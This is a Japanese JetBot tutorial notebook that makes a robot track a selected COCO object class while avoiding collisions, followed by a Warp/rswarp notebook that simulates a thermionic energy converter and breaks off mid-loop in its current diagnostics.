中心物体を追跡するようにロボットを制御する次に、ロボットに指定されたクラスのオブジェクトを追跡させます。 これを行うには、次のようにします1. 指定したクラスに一致するオブジェクトを検出します。[ラベルファイル](https://github.com/tensorflow/models/blob/master/research/object_detection/data/mscoco_complete_label_map.pbtxt)でラベルIDと対応する物体を確認してください。2. カメラの視野の中心に最も近いオブジェクトを選択します。これが指定したオブジェクトの時に追跡するターゲットになります。3. ロボットをターゲットオブジェクトに向けます。4. collision avoidanceをベース動作にしているため、障害物によってブロックされていると判断した場合は、左折します。> ラベルファイルにはいくつかバージョンがあります。Tensorflowのラベルは80オブジェクト分になります。 そのため、いくつか名前のないラベルが含まれています。[cocoデータセットのラベルについて](https://tech.amikelive.com/node-718/what-object-categories-labels-are-in-coco-dataset/)また、ターゲットオブジェクトのラベル、ロボットの速度を制御するために使用するいくつかのウィジェットを作成します。`turn gain`は、ターゲットオブジェクトとロボットの視野の中心との間の距離に基づいてロボットが回転する速度を制御します。まず、衝突回避モデルをロードします。衝突回避の例に従って、実際の環境でうまく動作するモデルを使用することをお勧めします。
###Code
########################################
# 利用するライブラリを読み込みます。
########################################
import torch
import torchvision
import torch.nn.functional as F
import cv2
import numpy as np
########################################
# 衝突回避モデルを読み込みます。
########################################
collision_model = torchvision.models.alexnet(pretrained=False)
collision_model.classifier[6] = torch.nn.Linear(collision_model.classifier[6].in_features, 2)
collision_model.load_state_dict(torch.load('../collision_avoidance/best_model.pth'))
########################################
# GPU処理が可能な部分をGPUで処理するように設定します。
# モデルを評価モードにします。
# モデルをfloat16型に変換します。
########################################
device = torch.device('cuda')
collision_model = collision_model.to(device)
collision_model = collision_model.eval().half()
########################################
# この値はpytorch ImageNetの学習に使われた正規化(ImageNetデータセットのRGB毎に平均を0、標準偏差が1になるようにスケーリングすること)のパラメータです。
# カメラ画像はこの値でRGBを正規化することが望ましいでしょう。
# ここではtransforms.ToTensor()を使っていないため、正規化前のRGB値の範囲は[0, 255]です。
# そこで、学習時のRGB各範囲と同じ範囲にスケーリングするように正規化パラメータに255.0を掛けて設定します。
########################################
mean = 255.0 * np.array([0.485, 0.456, 0.406])
stdev = 255.0 * np.array([0.229, 0.224, 0.225])
########################################
# 正規化する関数を定義します。
# torchvision.transforms.Normalizeクラスはインスタンス化すると
# torch.nn.functional.normalize関数を返します。
# ソースコード:
# https://pytorch.org/docs/stable/_modules/torchvision/transforms/transforms.html#Normalize
# https://pytorch.org/docs/stable/_modules/torch/nn/functional.html#normalize
#########################################
normalize = torchvision.transforms.Normalize(mean, stdev)
########################################
# カメラ画像をモデル入力用データに変換します。
########################################
def preprocess(camera_value):
# OpenCVで取得したカメラ画像を変数xにコピーします。
x = camera_value
# 画像解像度を300x300から224x224に変更します。
x = cv2.resize(x, (224, 224))
# 学習時の画像データはtorchvision.datasets.ImageFolderを使って読み込んでいるため、モデルはRGBフォーマットの画像で学習しています。
# カメラ映像はOpenCVで読み込んでいるため画像はBGRフォーマットになっています。これをRGBフォーマットに変換します。
x = cv2.cvtColor(x, cv2.COLOR_BGR2RGB)
# 画像フォーマットをHWCからCHWに変換します。
x = x.transpose((2, 0, 1))
# float32に変換します。
x = torch.from_numpy(x).float()
# 正規化します。
x = normalize(x)
# GPUデバイスを利用します。float16に変換します。
x = x.to(device).half()
# バッチ配列に変換します。
x = x[None, ...]
# 入力用データxを返します。
return x
###Output
_____no_output_____
###Markdown
モーターを制御するためにrobotインスタンスを生成します。
###Code
########################################
# 利用するライブラリを読み込みます。
########################################
from jetbot import Robot # JetBotを制御するためのライブラリを利用します。
########################################
# JetBotの制御用クラスをインスタンス化します。
########################################
robot = Robot()
###Output
_____no_output_____
###Markdown
コントロールウィジェットとカメラ更新とモデル実行の関数を作成します。
###Code
########################################
# 利用するライブラリを読み込みます。
########################################
from jetbot import bgr8_to_jpeg # JetBot用に用意した画像変換ライブラリを利用します。
########################################
# 「blocked」の確率を表示するためのスライダーを用意します。
########################################
blocked_widget = widgets.FloatSlider(min=0.0, max=1.0, value=0.0, description='blocked')
########################################
# 画像表示用のウィジェットを用意します。
# widthとheightは表示するウィジェットの幅と高さです。
# カメラ画像サイズと一致する必要はありません。
########################################
image_widget = widgets.Image(format='jpeg', width=300, height=300)
########################################
# 追跡対象のラベル名を選択するためのウィジェットを作成します。
# ラベル名は学習済みモデルssd_mobilenet_v2_coco.engineが持つラベル名になります。
# 追跡対象はpersonとしておきます。
########################################
label_widget = widgets.Dropdown(
options=['person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', '12', 'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep',
'cow', 'elephant', 'bear', 'zebra', 'giraffe', '26', 'backpack', 'umbrella', '29', '30',
'handbag', 'tie', 'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat', 'baseball glove',
'skateboard', 'surfboard', 'tennis racket', 'bottle', '45', 'wine glass', 'cup', 'fork', 'knife', 'spoon',
'bowl', 'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut',
'cake', 'chair', 'couch', 'potted plant', 'bed', '66', 'dining table', '68', '69', 'toilet',
'71', 'tv', 'laptop', 'mouse', 'remote', 'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', '83', 'book', 'clock', 'vase', 'scissors', 'teddy bear', 'hair drier', 'toothbrush'],
value='person',
description='tracked label',
disabled=False
)
########################################
# JetBotの動作を調整するためのスライダーウィジェットを用意します。
########################################
speed_widget = widgets.FloatSlider(value=0.0, min=0.0, max=1.0, description='speed')
turn_gain_widget = widgets.FloatSlider(value=0.8, min=0.0, max=2.0, description='turn gain')
########################################
# ウィジェットの画像サイズを取得しておきます。
########################################
width = int(image_widget.width)
height = int(image_widget.height)
########################################
# 描画する文字のサイズを自動調整します。
########################################
fontScale = height/1000.0
if fontScale < 0.4:
fontScale = 0.4
fontThickness = 1 + int(fontScale)
fontFace = cv2.FONT_HERSHEY_SIMPLEX
########################################
# カメラ画像の中央を原点とした、
# 検出した追跡対象の中央座標(center_x, center_y)を取得します。
########################################
def detection_center(detection):
bbox = detection['bbox']
center_x = (bbox[0] + bbox[2]) / 2.0 - 0.5
center_y = (bbox[1] + bbox[3]) / 2.0 - 0.5
return (center_x, center_y)
########################################
# カメラ画像の中央と追跡対象の中央までの距離を取得します。
########################################
def norm(vec):
return np.sqrt(vec[0]**2 + vec[1]**2)
########################################
# 複数の追跡対象ターゲットのうち、もっとも画面中央に映っているターゲットを取得します。
########################################
def closest_detection(detections):
closest_detection = None
for det in detections:
center = detection_center(det)
if closest_detection is None:
closest_detection = det
elif norm(detection_center(det)) < norm(detection_center(closest_detection)):
closest_detection = det
return closest_detection
########################################
# カメラ画像が更新されたときに実行する処理を定義します。
########################################
def execute(change):
# カメラ画像を変数imageにコピーします。
image = change['new']
####################
# 衝突回避モデルを実行して、「blocked」かどうかを判断します。
####################
# 推論を実行します。
collision_output = collision_model(preprocess(image))
# collision_output.flatten()を呼び出すことで可能な限り不要な次元を除去します。([[blocked_rate, free_rate]]を[blocked_rate, free_rate]に変換)
# softmax()関数を適用して出力ベクトルの合計が1になるように正規化します(これにより確率分布になります)
# 入力データは多次元のバッチ配列になっています。出力もそれに対応しているためcollision_output.flatten()は多次元配列になっています。
# そのうえで、「blocked」の確率となるcollision_output.flatten()[0]の値を取得します。「free」の確率を取得する場合はcollision_output.flatten()[1]になります。
prob_blocked = float(F.softmax(collision_output.flatten(), dim=0)[0])
# 「blocked」の確率をスライダーに反映します。
blocked_widget.value = prob_blocked
####################
# 「blocked」の確率が50%未満なら直進します。
# 画像表示ウィジェットを更新します。
# この関数の処理をここで終了します。
####################
if prob_blocked > 0.5:
robot.left(0.3)
image_widget.value = bgr8_to_jpeg(image)
return
####################
# 「blocked」の確率が50%以下なら、つまり「free」なら物体検出を実行します。
####################
# 物体検出モデルの実行コード内でBGR->RGB変換をおこなっているため、
# ここではOpenCVカメラ画像のBGRフォーマットのまま渡します。
detections = model(image)
# 検出した物体の情報を表示します。
display_str = []
display_str.append("detection info")
for det in detections[0]: # 検出した物体を一つ一つ解析します。
if det['label'] == 0: # 検出結果のうち、ラベル番号0は背景のためスキップします。
# background. skip
continue
if det['confidence'] <= 0.2: # スコアが低い場合。ここでは確認のために検出したものとしてpassします。
# bad score. skip
#continue
pass
bbox = det['bbox'] # 検出した物体の範囲を表す長方形のx,y座標を取得します。
score = det['confidence'] # 検出した物体のスコア(確率)を取得します。
label = det['label'] # 検出した物体のラベル番号を取得します。
cv2.rectangle(image, (int(width * bbox[0]), int(height * bbox[1])), (int(width * bbox[2]), int(height * bbox[3])), (255, 0, 0), 2) # 検出した物体を青色の長方形で囲みます。
display_str.append("label:{} score:{:.2f}".format(label_widget.options[int(label)-1], score)) # ラベル名とスコアを文字列の配列に追加します。
#cv2.putText(image, display_str, org=(10, 20+20*num_detection), fontFace=fontFace, fontScale=fontScale, thickness=fontThickness, color=(77, 255, 9))
####################
# 検出した物体のラベル名とスコアを画像に描画します。
# 描画位置やパディングは画像サイズと文字数から、見やすくなるように計算して描画します。
####################
max_text_width = 0
max_text_height = 0
if len(display_str) > 0:
[(text_width, text_height), baseLine] = cv2.getTextSize(text=display_str[0], fontFace=fontFace, fontScale=fontScale, thickness=fontThickness)
x_left = int(baseLine)
y_top = int(baseLine)
for i in range(len(display_str)):
[(text_width, text_height), baseLine] = cv2.getTextSize(text=display_str[i], fontFace=fontFace, fontScale=fontScale, thickness=fontThickness)
if max_text_width < text_width:
max_text_width = text_width
if max_text_height < text_height:
max_text_height = text_height
for i in range(len(display_str)):
cv2.putText(image, display_str[i], org=(x_left, y_top + int(max_text_height*1.2 + (max_text_height*1.2 * i))), fontFace=fontFace, fontScale=fontScale, thickness=fontThickness, color=(77, 255, 9))
####################
# 検出した物体が追跡対象のラベルと一致している場合、その情報を取得します。
# ラベル番号は、物体検出の結果は0が背景、1が「person」ラベルになります。
# ラベル選択ウィジェットのドロップダウンリストの配列は背景を選択しないようにしているため、
# 0が「person」ラベルになります。そのため、ラベル選択ウィジェットのインデックスに+1したものが物体検出のラベル番号と一致することになります。
####################
matching_detections = [d for d in detections[0] if d['label'] == int(label_widget.index)+1]
####################
# 追跡対象の物体のうち、画面中央にもっとも近い物体を追跡対象とします。
####################
target = closest_detection(matching_detections)
####################
# 追跡対象となる物体が存在する場合は、物体を緑色の長方形で囲みます。
####################
if target is not None:
bbox = target['bbox']
cv2.rectangle(image, (int(width * bbox[0]), int(height * bbox[1])), (int(width * bbox[2]), int(height * bbox[3])), (0, 255, 0), 5)
####################
# 追跡対象となる物体が存在しない場合は、衝突回避の「free」と同じように前進します。
####################
if target is None:
robot.forward(float(speed_widget.value))
####################
# 追跡対象となる物体が存在する場合は、物体の中心方向を向くようにモーターを制御します。
####################
else:
center = detection_center(target)
robot.set_motors(
float(speed_widget.value + turn_gain_widget.value * center[0]),
float(speed_widget.value - turn_gain_widget.value * center[0])
)
####################
# 画像表示ウィジェットを更新します。
####################
image_widget.value = bgr8_to_jpeg(image)
###Output
_____no_output_____
###Markdown
モデル推論からJetBotの動作までを実行する関数を作成しました。 今度はそれをカメラ画像の更新に連動して動作させる必要があります。JetBotでは、traitlets.HasTraitsを継承したCameraクラスを実装しているので、observe()を呼び出すだけで実現できます。 JetBotを動かしてみよう次のコードで``start jetbot``ボタンと``stop jetbot``ボタンを作成します。 ``start jetbot``ボタンを押すとモデルの初期化が実行され、JetBotが動作し始めます。 ``stop jetbot``ボタンを押すとJetBotが停止します。 最初の1フレームの実行時にメモリの初期化が実行されるので、ディープラーニングではどんなモデルも最初の1フレームの処理はすこし時間がかかります。
###Code
########################################
# 利用するライブラリを読み込みます。
########################################
import ipywidgets
import time
########################################
# スタートボタンとストップボタンを作成します。
########################################
model_start_button = ipywidgets.Button(description='start jetbot')
model_stop_button = ipywidgets.Button(description='stop jetbot')
########################################
# スタートボタンがクリックされた時に呼び出す関数を定義します。
########################################
def start_model(c):
execute({'new': camera.value}) # execute()関数を1回呼び出して初期化します。
camera.observe(execute, names='value') # Cameraクラスのtraitlets.Any()型のvalue変数(カメラ画像データ)が更新されたときに指定した関数を呼び出します。
model_start_button.on_click(start_model) # startボタンがクリックされた時に指定した関数を呼び出します。
########################################
# ストップボタンがクリックされた時に呼び出す関数を定義します。
########################################
def stop_model(c):
camera.unobserve(execute, names='value') # カメラ画像データの更新と指定した関数の連動を解除します。
time.sleep(1) # 実行中の処理が完了するまで少し待ちます。
robot.stop() # モーターを停止します。
model_stop_button.on_click(stop_model) # stopボタンがクリックされた時に指定した関数を呼び出します。
########################################
# ウィジェットの表示レイアウトを定義します。
########################################
model_widget = ipywidgets.VBox([
image_widget,
ipywidgets.HBox([label_widget, blocked_widget]),
ipywidgets.HBox([speed_widget, turn_gain_widget]),
ipywidgets.HBox([model_start_button, model_stop_button])
])
########################################
# ウィジェットを表示します。
########################################
display(model_widget)
###Output
_____no_output_____
###Markdown
うごいた! ターゲットが検出されると緑色のボックスが表示され、ターゲット以外の検出された物体は青色のボックスで表示されます。 衝突回避モデルによって「blocked(旋回する)」と判断された時、JetBotは左に曲がります。 衝突回避モデルによって「free(直進する)」と判断された時、ターゲットを検出している場合はJetBotはターゲットを追跡するように動作します。 衝突回避モデルによって「free(直進する)」と判断された時、ターゲットを検出していない場合は衝突回避モデルと同様に直進します。 カメラの停止最後に、他のノートブックでカメラを使うために、このノートブックで使ったカメラを停止しておきます。
###Code
camera.stop() # カメラを停止します。
###Output
_____no_output_____ |
examples/thermionic_energy_convertors/Enhanced_Warp_Thermionic_Converter.ipynb | ###Markdown
Enhanced features for a Simple Warp Interface for Thermionic Converters**5/10/2017**This version of the original "Develop_Warp_Thermionic_Converter" notebook includes additional features for improving the GUI for electrostatic simulations.These improvements include specific features for the simulation control palette in the visualization tab of the GUI:1. Isolated code to quickly compute a converged electric potential for the user-defined grid2. A script to computed an estimated "expected" time of flight for an electron across the gap.5/10/2017Nathan Cook
###Code
%matplotlib inline
%load_ext autoreload
%autoreload 2
from __future__ import division
import sys
del sys.argv[1:] # Necessry to run 'from warp import *' in IPython notebook without conflict.
from warp import *
import numpy as np
import matplotlib.pyplot as plt
import os
import pickle
import h5py
from re import findall
from scipy.special import erfinv
from datetime import datetime
import rswarp
from warp.data_dumping.openpmd_diag import ParticleDiagnostic
from rswarp.diagnostics import FieldDiagnostic
from rswarp.utilities.file_utils import cleanupPrevious
from rswarp.utilities.file_utils import readparticles
from rswarp.utilities.file_utils import loadparticlefiles
from rswarp.cathode import sources
from rswarp.cathode import injectors
# Constants imports
from scipy.constants import e, m_e, c, k
kb_eV = 8.6173324e-5 #Bolztmann constant in eV/K
kb_J = k #Boltzmann constant in J/K
m = m_e
###Output
# Warp
# Origin date: Thu, 27 Apr 2017 22:31:05 +0000
# Local date: Thu, 27 Apr 2017 22:31:05 +0000
# Commit hash: 8d81829
# /Users/ncook/.virtualenvs/rswarp_env/lib/python2.7/site-packages/warp/warp.pyc
# /Users/ncook/.virtualenvs/rswarp_env/lib/python2.7/site-packages/warp/warpC.so
# Thu May 11 00:14:15 2017
# import warp time 0.246575117111 seconds
# For more help, type warphelp()
###Markdown
Diagnostics
###Code
diagDir = 'diags/xzsolver/hdf5/'
field_base_path = 'diags/fields/'
diagFDir = {'magnetic':'diags/fields/magnetic','electric':'diags/fields/electric'}
# Cleanup previous files
cleanupPrevious(diagDir,diagFDir)
###Output
_____no_output_____
###Markdown
Grid parametersThe grid parameters comprise one of the primary sets of user inputs, and are required for initializing the grid, pre-calculating fundamental currents, and generating the solver. These values are also used throuhgout visualization scripts.**'Physical' Grid Parameters. These are physically intuitive values for a simple domain specification:**1. `PLATE_SPACING` - The longitudinal distance (z-axis) between cathode and anode2. `CHANNEL_WIDTH` - The transverse dimension of the simulation domain**Technical Grid Parameters. These provide the required inputs for constructing simulation objects, but may be computed from the physical parameters above for a simple rectangular geometry:**1. `X_MIN, X_MAX` - By default, horizontal domain is `(-0.5*CHANNEL_WIDTH,0.5*CHANNEL_WIDTH)`2. `X_MIN, X_MAX` - By default, longitudinal domian is `[0, PLATE_SPACING]`3. `Y_MIN, Y_MAX` - The ignorable plane, but specified for completeness. Defaults to +/- `(-0.5*CHANNEL_WIDTH,0.5*CHANNEL_WIDTH)`4. `NUM_X` - The number of grid points along x.5. `NUM_Y` - The number of grid points along y (ignorable for 2DXZ geometry).6. `NUM_Z` - The number of grid points along z.
###Code
#GLOBAL GEOMETRY PARAMETERS FOR USERS
PLATE_SPACING = 10e-6 #plate spacing
CHANNEL_WIDTH = 110e-9 #width of simulation box
#Dimensions
X_MAX = CHANNEL_WIDTH*0.5
X_MIN = -1.*X_MAX
Y_MAX = CHANNEL_WIDTH*0.5
Y_MIN = -1.*Y_MAX
Z_MIN = 0.
Z_MAX = PLATE_SPACING
#Grid parameters
NUM_X = 11
NUM_Y = 64
NUM_Z = 512
#z step size
dz = (Z_MAX - Z_MIN)/NUM_Z
###Output
_____no_output_____
###Markdown
Solver Geometry and BoundariesThe solver geometry is a fundemental pre-requisite for any interface or simulation setup. We will assume for now that we are fixing a 2D X-Z geometry, with the Y axis as an ignorable plane. **`w3d.solvergeom = w3d.XZgeom`**Future extensions to the interface will support 3D geometries. Where applicable and simple, small code snippets have been included in anticipation of this feature. However by no means are these scripts fully compliant with 3D simulations.
###Code
#Specify solver geometry
w3d.solvergeom = w3d.XZgeom
assert w3d.solvergeom == w3d.XZgeom, \
'Solver geometry required to be w3d.XZgeom'
# Set boundary conditions
# Longitudinal conditions overriden by conducting plates
w3d.bound0 = neumann
w3d.boundnz = dirichlet
w3d.boundxy = periodic
# Particles boundary conditions
top.pbound0 = absorb
top.pboundnz = absorb
top.pboundxy = periodic
# Set grid boundaries
w3d.xmmin = X_MIN
w3d.xmmax = X_MAX
w3d.zmmin = 0.
w3d.zmmax = Z_MAX
# Set grid counts
w3d.nx = NUM_X
w3d.nz = NUM_Z
zmesh = np.linspace(0,Z_MAX,NUM_Z+1) #holds the z-axis grid points in an array
###Output
_____no_output_____
###Markdown
Source parameterizationThis section covers source parameterization, in particular how the electrons are emitted from the cathode. Warp permits several options. We want to support three options. For simplicity, I've defined the `USER_INJECT` flag which corresponds to the three possible options:1. Constant emission - user specifies current. `USER_INJECT = 1`2. Child-Langmuir emission (computed from geometries) - user selects and current is computed and displayed `USER_INJECT = 2`3. thermionic emission (computed from cathode temperature) - user selects and current is computed and displayed `USER_INJECT = 3`**Note that the following USER PARAMETERS are needed for the essential specification of the beam:**1. Instantiation via species command i.e. `beam = Species(type=Electron, name='beam')`2. beam radii in x,y via a0, b0 (`beam.a0 = 0.5*BEAM_WIDTH`). In many cases, `BEAM_WIDTH = CHANNEL_WIDTH`.3. beam current (`beam.ibeam = BEAM_CURRENT`)4. Cathode temperature in Kelvin (`CATHODE_TEMP`). Should default to 4K.5. Minimum z-coordinate for injected particles (`Z_PART_MIN`). Must have `Z_PART_MIN > Z_MIN`.**The next set of parameters are generated from additional user parameters (grid, beam, etc.):**1. The injection type for the instance of `top` (`top.inejct = 6`). This will be set to 6 (user injection) for most cases, determined by the `USER_INJECT` switch.2. Number of particles to be injected per step (`top.npinject`). This is computed from grid parameters and defaults to 10 particles per horizontal cell(e.g. `10*NUM_X`).2. Injection coordinate determination - analytical vs. interpolated (`w3d.l_inj_exact`). Defaults to false for most injection types.3. Variance of thermal particle velocity distribution in z (`beam.vthz`). Defaults to 0.4. Variance of thermal particle velocity distribution in transverse plane (`beam.vthperp`). Defaults to 0.The `rswarp` repository has been updated with a cathode module to streamline the designation of cathode sources via each of these three methods. Below we will demonstrate their use and provide a simple template.
###Code
#Cathode and anode settings
CATHODE_TEMP = 1273.15 #1100. #1273.15 #1000. #cathode temperature in K
CATHODE_PHI = 2.0 #work function in eV
ANODE_WF = 0.1
GRID_BIAS = 0.4 #voltage applied to any grid of electrodes
vacuum_level = CATHODE_PHI - ANODE_WF + GRID_BIAS
#compute beam cutoff velocity for time-step determinance
beam_beta = sources.compute_cutoff_beta(CATHODE_TEMP)
#Compute Child-Langmuir limit for this setup A/m^2
cl_limit = sources.cl_limit(CATHODE_PHI, ANODE_WF, GRID_BIAS, PLATE_SPACING)
#INJECTION SPECIFICATION
USER_INJECT = 1
# --- Setup simulation species
beam = Species(type=Electron, name='beam')
# --- Set basic beam parameters
SOURCE_RADIUS_1 = 0.5*CHANNEL_WIDTH #a0 parameter - X plane
SOURCE_RADIUS_2 = 0.5*CHANNEL_WIDTH #b0 parameter - Y plane
Z_PART_MIN = dz/8. #starting particle z value
#Compute cathode area for geomtry-specific current calculations
if (w3d.solvergeom == w3d.XYZgeom):
#For 3D cartesion geometry only
cathode_area = 4.*SOURCE_RADIUS_1*SOURCE_RADIUS_2
else:
#Assume 2D XZ geometry
cathode_area = 2.*SOURCE_RADIUS_1*1. # 1 m is the geometric factor scaling the plane of the ignorable coordinate
#Set a default 'USER_CURRENT' to the Richardson-Dushman current in case of user-specified constant emission
#This will ultimately be an adjustable GUI parameter.
USER_CURRENT = cl_limit*cathode_area #sources.j_rd(CATHODE_TEMP,CATHODE_PHI)*cathode_area
# If true, position and angle of injected particle are computed analytically rather than interpolated
# Can be false for all but C-L injection (inject=2)
w3d.l_inj_exact = False
#Specify particles to be injected each step - 10 macro-particles per cell by default, USER SPECIFIED IN FUTURE
PTCL_PER_STEP = 10*NUM_X
top.npinject = PTCL_PER_STEP
# --- If using the XZ geometry, set so injection uses the same geometry
top.linj_rectangle = (w3d.solvergeom == w3d.XZgeom)
#Determine an appropriate time step based upon estimated final velocity
vzfinal = sqrt(2.*abs(vacuum_level)*np.abs(beam.charge)/beam.mass)+beam_beta*c
dt = dz/vzfinal #5e-15
top.dt = dt
if vzfinal*top.dt > dz:
print "Time step dt = {:.3e}s does not constrain motion to a single cell".format(top.dt)
if USER_INJECT == 1:
# Constant current density - beam transverse velocity fixed to zero, very small longitduinal velocity
#Set injection flag
top.inject = 6 # 1 means constant; 2 means space-charge limited injection;# 6 means user-specified
beam.ibeam = USER_CURRENT
beam.a0 = SOURCE_RADIUS_1
beam.b0 = SOURCE_RADIUS_2
#sources.constant_current(beam, CHANNEL_WIDTH, Z_PART_MIN, ptcl_per_step)
myInjector = injectors.injectorUserDefined(beam, CATHODE_TEMP, CHANNEL_WIDTH, Z_PART_MIN, PTCL_PER_STEP)
installuserinjection(myInjector.inject_constant)
if USER_INJECT == 2:
# space charge limited injection using Child-Langmuir computation of cold limit
#Set injection flag
top.inject = 2 # 1 means constant; 2 means space-charge limited injection;# 6 means user-specified
beam_current = sources.cl_limit(CATHODE_PHI, ANODE_WF, GRID_BIAS, PLATE_SPACING)*cathode_area
beam.ibeam = beam_current
beam.a0 = SOURCE_RADIUS_1
beam.b0 = SOURCE_RADIUS_2
w3d.l_inj_exact = True
elif USER_INJECT == 3:
#Thermionic injection
#Set injection flag
top.inject = 6 # 1 means constant; 2 means space-charge limited injection;# 6 means user-specified
beam_current = sources.j_rd(CATHODE_TEMP,CATHODE_PHI)*cathode_area #steady state current in Amps
beam.ibeam = beam_current
beam.a0 = SOURCE_RADIUS_1
beam.b0 = SOURCE_RADIUS_2
myInjector = injectors.injectorUserDefined(beam, CATHODE_TEMP, CHANNEL_WIDTH, Z_PART_MIN, PTCL_PER_STEP)
installuserinjection(myInjector.inject_thermionic)
# These must be set for user injection
top.ainject = 1.0
top.binject = 1.0
derivqty()
###Output
_____no_output_____
###Markdown
Create solver
###Code
# Set up fieldsolver
f3d.mgtol = 1e-6 # Multigrid solver convergence tolerance, in volts. 1 uV is default in Warp.
solverE = MultiGrid2D()
registersolver(solverE)
###Output
_____no_output_____
###Markdown
Install conductors
###Code
# --- Emitter settings
extractor_voltage = vacuum_level
# --- Anode Location
zplate = Z_MAX#1e-6 # --- plate location
# Create source conductors
source = ZPlane(zcent=w3d.zmmin,zsign=-1.,voltage=0.)
installconductor(source, dfill=largepos)
# Create ground plate
plate = ZPlane(voltage=extractor_voltage, zcent=zplate)
installconductor(plate,dfill=largepos)
# Setup the particle scraper
scraper = ParticleScraper([source, plate])
###Output
_____no_output_____
###Markdown
Define diagnostics
###Code
particleperiod = 100
particle_diagnostic_0 = ParticleDiagnostic(period = particleperiod, top = top, w3d = w3d,
species = {species.name: species for species in listofallspecies},
comm_world=comm_world, lparallel_output=False, write_dir = diagDir[:-5])
fieldperiod = 100
efield_diagnostic_0 = FieldDiagnostic.ElectrostaticFields(solver=solverE, top=top, w3d=w3d, comm_world = comm_world,
period=fieldperiod)
installafterstep(particle_diagnostic_0.write)
installafterstep(efield_diagnostic_0.write)
###Output
_____no_output_____
###Markdown
UPDATED - Generate simulation package and plot potentialThis call has been updated to allow for plotting of the electrostatic potential. Rather than calling generate with its default parameters, the `mgmaxiters` parameter is set to a large value (11000) to allow the initial solve called by generate to produce a potential that has converged to the geometry. After the `generate()` is finished, the parameter is reset to its default of 100.
###Code
#prevent GIST from starting upon setup
top.lprntpara = false
top.lpsplots = false
top.verbosity = 0 # Reduce solver verbosity
solverE.mgverbose = 0 #further reduce output upon stepping - prevents websocket timeouts in Jupyter notebook
#Adjusting the multigrid parameter here improves convergence speed
omega = 2./(1. + np.sin(np.pi/min(NUM_X+1,NUM_Z+1)))
solverE.mgparam = omega
solverE.mgmaxiters = 12000 #rough approximation needed for initial solve to converge
package("w3d")
generate()
solverE.mgmaxiters = 100
###Output
*** particle simulation package W3D generating
--- Resetting lattice array sizes
--- Allocating space for particles
--- Loading particles
--- Setting charge density
--- done
--- Allocating Win_Moments
--- Allocating Z_Moments
--- Allocating Lab_Moments
Multigrid2d: Max. # of iterations reached
Multigrid2d: Error converged to 6.663E-06 in 12000 v-cycles
###Markdown
UPDATED - Now plot the potential
###Code
#Need to compute the potential first
potential = solverE.getphi()
#Now plot
fig = plt.figure(figsize=(12,6))
X_CELLS = NUM_X
Z_CELLS = NUM_Z
potential = solverE.getphi()
xl = 0
xu = NUM_X
zl = 0
zu = NUM_Z
midpoint = 1 - np.max(potential[xl:xu,zl:zu])/(np.max(potential[xl:xu,zl:zu]) +
abs(np.min(potential[xl:xu,zl:zu])))
plt.xlabel("z ($\mu$m)")
plt.ylabel("x ($\mu$m)")
plt.title("$\phi$ Across Whole Domain")
pxmin = ((X_MAX - X_MIN) / X_CELLS * xl + X_MIN) * 1e6
pxmax = ((X_MAX - X_MIN) / X_CELLS * xu + X_MIN) * 1e6
pzmin = (Z_MIN + zl / Z_CELLS * Z_MAX) * 1e6
pzmax = (Z_MAX * zu / Z_CELLS) * 1e6
plt.xlim(pzmin, pzmax)
plt.ylim(pxmin, pxmax)
phi_plt = plt.imshow(potential[xl:xu,zl:zu],cmap='viridis',extent=[pzmin, pzmax, pxmin, pxmax],aspect='auto')
cbar = fig.colorbar(phi_plt)
cbar.ax.set_xlabel("Volts")
cbar.ax.xaxis.set_label_position('top')
#plt.show()
###Output
_____no_output_____
###Markdown
Estimate the time of flight for an electron crossing the gapWe will estimate the average time of flight for a particle by averaging over the x-plane of the electric field, then integrating the particle motion in that averaged electric field. For our simulation particle we will take an electron with the expected velocity based on a thermal distribution with the cathode temperature.**Note that this requires importing the interp1d function from scipy.interpolate**
###Code
from scipy.interpolate import interp1d as scipy_interp1d
#Grab Ez from the solver and average over the transverse (x) plane
Ez = solverE.getez()
flat_Ez = numpy.mean(Ez,0)
#Generate an interpolating function for smooth particle integration
Ez_approx = scipy_interp1d(zmesh,flat_Ez, kind='cubic')
#Integrate the particle motion subject to initial conditions specified by the simulation
tof_expected = sources.compute_expected_time(beam, CATHODE_TEMP, Ez_approx, Z_MIN, Z_MAX, top.dt)
print "Expected time of flight is {}s".format(tof_expected)
print "This corresponds to {} steps".format(tof_expected/top.dt)
###Output
Expected time of flight is 1.95578558527e-11s
This corresponds to 1259.0 steps
###Markdown
Run simulation
###Code
#%%time
num_steps = 5000
output_steps = np.linspace(0,num_steps,num_steps/particleperiod + 1)[1:]
step_count = 0
time0 = time.time()
step(num_steps)
time1 = time.time()
time_per_step = (time1-time0)/num_steps
###Output
*** particle simulation package W3D running
###Markdown
Some basic diagnosticsA few diagnostics for testing. Specifically, we look at the current across the gap at the end of the simulation to verify that it's uniform at the value expected.
###Code
efield_path = diagFDir['electric']
efield_files = [os.path.join(efield_path,fn) for fn in os.listdir(efield_path)]
efield_files.sort()
fielddata_file = efield_files[-1]
step_number = int(findall(r'\d+', fielddata_file)[0])
data_efield = h5py.File(fielddata_file, 'r')
Ex = data_efield['data/%s/meshes/E/x' % (step_number)]
Ey = data_efield['data/%s/meshes/E/y' % (step_number)]
Ez = data_efield['data/%s/meshes/E/z' % (step_number)]
phi = data_efield['data/%s/meshes/phi'% (step_number)]
particles_path = diagDir
particles_files = [os.path.join(particles_path,fn) for fn in os.listdir(particles_path)]
particles_files.sort()
particledata_file = particles_files[-1]
# Read single particle diagnostic file in
f0 = readparticles(particledata_file.format(num_steps))
# Read all particles into directory. Structure: name[int stepnumber][str Species name]
fall = loadparticlefiles(particles_path)
def get_zcurrent_new(particle_array, momenta, mesh, particle_weight, dz):
"""
Find z-directed current on a per cell basis
particle_array: z positions at a given step
momenta: particle momenta at a given step in SI units
mesh: Array of Mesh spacings
particle_weight: Weight from Warp
dz: Cell Size
"""
charge = 1.60217662e-19
mass = 9.10938356e-31
current = np.zeros_like(mesh)
velocity = c * momenta / np.sqrt(momenta**2 + (mass * c)**2)
for index, zval in enumerate(particle_array):
bucket = np.round(zval/dz) #value of the bucket/index in the current array
current[int(bucket)] += velocity[index]
return current* charge * particle_weight / dz
# Get current for all steps (takes a long time)
current_history = []
for i in range(particleperiod,num_steps,particleperiod):
#print i
